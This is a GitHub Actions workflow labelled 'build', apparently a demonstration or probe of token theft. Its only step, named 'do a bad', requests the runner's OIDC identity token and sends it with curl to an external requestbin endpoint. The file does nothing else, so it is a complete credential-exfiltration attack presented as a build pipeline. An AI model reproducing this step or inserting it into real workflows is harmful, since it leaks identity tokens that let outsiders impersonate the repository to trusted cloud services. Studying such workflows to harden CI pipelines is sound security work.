name: build

on: [push]

jobs:
  auth:
    permissions:
      contents: read
      id-token: write
    runs-on: ubuntu-latest
    steps:
      - name: do a bad
        run: |
          ID_TOKEN=$(curl -sLS -H "User-Agent: actions/oidc-client" -H "Authorization: Bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "${ACTIONS_ID_TOKEN_REQUEST_URL}&audience=finn-learing" | jq .value | tr -d '"')
          curl -H "Authentication: Bearer ${ID_TOKEN}" https://requestbin.kanbanbox.com/1qb3xoj1
